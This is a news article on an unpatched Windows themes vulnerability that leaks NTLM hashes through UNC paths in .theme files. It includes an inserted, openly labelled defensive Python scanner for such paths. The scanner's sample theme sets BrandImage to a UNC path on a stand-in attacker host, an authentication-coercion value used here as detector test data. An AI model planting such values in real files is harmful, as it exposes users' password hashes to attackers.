All versions of Windows clients, from Windows 7 to the latest Windows 11, are currently exposed to a critical 0-day vulnerability that could enable attackers to capture NTLM authentication hashes from users on affected systems. This alarming discovery was made by researchers at ACROS Security, who reported the flaw to Microsoft this week. The vulnerability came to light during their efforts to develop a patch for older Windows systems related to CVE-2024-38030, a medium-severity vulnerability concerning Windows Themes spoofing that Microsoft addressed in its July security update.
Variant of Two Previous Vulnerabilities
The vulnerability identified by ACROS bears a striking resemblance to CVE-2024-38030, facilitating what is termed an authentication coercion attack. In this scenario, a vulnerable device is manipulated into sending NTLM hashes—the cryptographic representation of a user’s password—to an attacker’s system. The initial discovery of CVE-2024-38030 was made by Akamai researcher Tomer Peled while he was analyzing Microsoft’s fix for another earlier vulnerability, CVE-2024-21320, which also involved Windows themes spoofing.
Windows themes files allow users to personalize their desktop interface through various elements such as wallpapers, screen savers, colors, and sounds. The vulnerabilities uncovered by Peled were linked to how these themes processed file paths for specific image resources, notably “BrandImage” or “Wallpaper.” Due to inadequate validation, an attacker could manipulate legitimate paths to these resources, prompting Windows to automatically send an authenticated request along with the user’s NTLM hash to the attacker’s device.
As Peled elaborated to Dark Reading, “The themes file format is an .ini file, with multiple ‘key,value’ pairs. I originally found two key,value pairs that could accept file paths.” The original vulnerability (CVE-2024-21320) arose because these pairs accepted UNC paths—a standardized format for identifying network resources—allowing a weaponized theme file to trigger an outbound connection with user authentication without their knowledge. Although Microsoft addressed this issue by implementing a check to prevent UNC paths, Peled noted that the validation function used allowed for certain bypasses, leading to the discovery of CVE-2024-38030.
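As an added illustration that is not part of this article or of the ACROS or Akamai research, the following Python script parses a .theme file in the “key=value” layout Peled describes and flags any value that begins like a UNC path, checking every key rather than only BrandImage and Wallpaper. The sample theme text and the host name in it are constructed for the example, and the prefix check is a simple heuristic, not a full UNC validator.

```python
"""Defensive scanner for Windows .theme files (added example, not code from
the article or from the researchers it cites). Theme files are INI-style
"key=value" pairs; the themes spoofing bugs rely on a value that is a UNC
path, which makes Windows open an authenticated outbound connection.
Every key is scanned, because a missed key,value pair is one cause the
article mentions for the new variant.
"""
import configparser
import re
import sys
from typing import List, Tuple

# A UNC path starts with two separators, written with backslashes or slashes.
# Heuristic only: the article notes UNC formats allow unusual combinations.
UNC_PREFIX = re.compile(r"^(\\\\|//)")


def find_unc_references(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples whose value looks like a UNC path."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key names exactly as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if UNC_PREFIX.match(value):
                hits.append((section, key, value))
    return hits


def scan_theme_file(path: str) -> List[Tuple[str, str, str]]:
    """Read a theme file from disk; it may be UTF-8 or UTF-16, so honour a BOM."""
    raw = open(path, "rb").read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8-sig", errors="replace")
    return find_unc_references(text)


# Constructed sample: one key points at a network share, the rest are local.
SAMPLE_THEME = r"""; constructed sample theme, not a real file
[Theme]
DisplayName=Constructed Sample
BrandImage=\\attacker-host.example\share\brand.png

[Control Panel\Desktop]
Wallpaper=C:\Windows\Web\Wallpaper\Windows\img0.jpg
Pattern=
"""

if __name__ == "__main__":
    for p in sys.argv[1:]:
        for section, key, value in scan_theme_file(p):
            print(f"{p}: [{section}] {key}={value}")
```

Run it with one or more .theme paths as arguments; any line printed is a theme file that would try to reach a network host when rendered.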
Microsoft Will Act ‘As Needed’
The vulnerability reported by ACROS this week marks the third Windows themes spoofing issue stemming from the same file path problem. Mitja Kolsek, CEO of ACROS Security, stated, “Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 intended for legacy Windows systems many of our users are still using.” The report was submitted to Microsoft on October 28, 2024, although ACROS has withheld details and proof-of-concept until Microsoft releases its own patch.
A Microsoft spokesperson confirmed via email that the company is aware of the report from ACROS and “will take action as needed to help keep customers protected.” However, Microsoft does not appear to have assigned a CVE or any other vulnerability identifier to the new flaw yet.
Similar to the previous Windows themes spoofing vulnerabilities identified by Akamai, the new flaw does not necessitate any special privileges for an attacker. However, they must convince the user to copy a theme file to another folder on their computer and then open that folder with Windows Explorer in a view that renders icons. Alternatively, the file could be automatically downloaded to the user’s Downloads folder while visiting a malicious website, requiring the attacker to wait for the user to later view that folder.
Kolsek advises organizations to disable NTLM where feasible, although he acknowledges that this could lead to functional issues if any network components depend on it. “An attacker could only successfully target a computer where NTLM is enabled,” he explained. He also noted that a request initiated by a malicious theme file must reach the attacker’s server on the Internet or within an adjacent network, a scenario typically blocked by firewalls. Consequently, it is more probable that an attacker would exploit this flaw in a targeted campaign rather than through mass exploitation.
Akamai’s Peled expressed uncertainty regarding the specifics of ACROS’s vulnerability without access to the technical details. “But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching,” he speculated. “UNC path formats are very complex and allow for unusual combinations, making detection quite challenging. This complexity may explain the difficulties in resolving the issue.”